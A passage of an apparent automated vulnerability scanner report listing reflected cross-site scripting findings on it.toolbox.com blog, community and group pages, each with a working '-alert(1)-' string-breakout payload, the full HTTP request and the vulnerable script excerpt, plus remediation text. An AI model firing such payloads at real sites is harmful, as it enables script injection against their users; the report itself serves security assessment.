<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Technical D ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d38720%267966f'-alert(1)-'717976eea32%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb910'-alert(1)-'cf3f8d419ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/cb910'-alert(1)-'cf3f8d419ca HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63836 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26cb910'-alert(1)-'cf3f8d419ca'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.78. http://it.toolbox.com/blogs/ppmtoday/the-check-box-how-flaky-practices-get-encoded-into-your-business-42620 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9947e'-alert(1)-'b768ccdb619 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/the-check-box-how-flaky-practices-get-encoded-into-your-business-42620?9947e'-alert(1)-'b768ccdb619=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 69445 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:31 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:45:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> The Check B ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d42620%269947e'-alert(1)-'b768ccdb619%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6fb19'-alert(1)-'c89de4fa829 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/6fb19'-alert(1)-'c89de4fa829 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63836 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:47:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%266fb19'-alert(1)-'c89de4fa829'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.80. http://it.toolbox.com/blogs/ppmtoday/the-emergent-comedy-39924 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday/the-emergent-comedy-39924
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 670b8'-alert(1)-'7dcaf45a1ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/the-emergent-comedy-39924?670b8'-alert(1)-'7dcaf45a1ad=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 68919 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:38 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> The Emergen ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d39924%26670b8'-alert(1)-'7dcaf45a1ad%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c0c4'-alert(1)-'6f5648481ff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/2c0c4'-alert(1)-'6f5648481ff HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63836 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%262c0c4'-alert(1)-'6f5648481ff'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.82. http://it.toolbox.com/blogs/ppmtoday/the-wocket-in-your-pocket-42008 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday/the-wocket-in-your-pocket-42008
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5e9d'-alert(1)-'a125a80c31c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/the-wocket-in-your-pocket-42008?b5e9d'-alert(1)-'a125a80c31c=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 69550 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:35 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:45:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> The Wocket ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d42008%26b5e9d'-alert(1)-'a125a80c31c%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd3d0'-alert(1)-'863012dc017 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/cd3d0'-alert(1)-'863012dc017 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63836 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26cd3d0'-alert(1)-'863012dc017'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.84. http://it.toolbox.com/blogs/ppmtoday/two-old-pals-41071 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday/two-old-pals-41071
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f617'-alert(1)-'679cdacb38f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/two-old-pals-41071?5f617'-alert(1)-'679cdacb38f=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 68775 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:34 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:45:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Two Old Pal ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d41071%265f617'-alert(1)-'679cdacb38f%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a8a5'-alert(1)-'91b7ec83dbe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/4a8a5'-alert(1)-'91b7ec83dbe HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63838 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%264a8a5'-alert(1)-'91b7ec83dbe'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.86. http://it.toolbox.com/blogs/ppmtoday/venture-and-gender-43847 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday/venture-and-gender-43847
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee209'-alert(1)-'185afe72fe1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/venture-and-gender-43847?ee209'-alert(1)-'185afe72fe1=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 66189 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:26 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:45:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Venture and ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d43847%26ee209'-alert(1)-'185afe72fe1%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0965'-alert(1)-'e613cc08901 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/d0965'-alert(1)-'e613cc08901 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63836 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26d0965'-alert(1)-'e613cc08901'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.88. http://it.toolbox.com/blogs/ppmtoday/why-should-i-change-40067 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday/why-should-i-change-40067
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28cff'-alert(1)-'27a3eb6d893 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/why-should-i-change-40067?28cff'-alert(1)-'27a3eb6d893=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 81340 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:17 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Why Should ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d40067%2628cff'-alert(1)-'27a3eb6d893%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.89. http://it.toolbox.com/communities/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/communities/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75c02'-alert(1)-'c6fa87a6781 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /communities/?75c02'-alert(1)-'c6fa87a6781=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 48832 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Toolbox for ...[SNIP]... ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2funicorn%2fCommunityDirectory.aspx%2f%3f75c02'-alert(1)-'c6fa87a6781%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.90. http://it.toolbox.com/groups/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/groups/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 341e6'-alert(1)-'a97f04ef44c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /groups/?341e6'-alert(1)-'a97f04ef44c=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 79118 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:48:50 GMT Connection: close
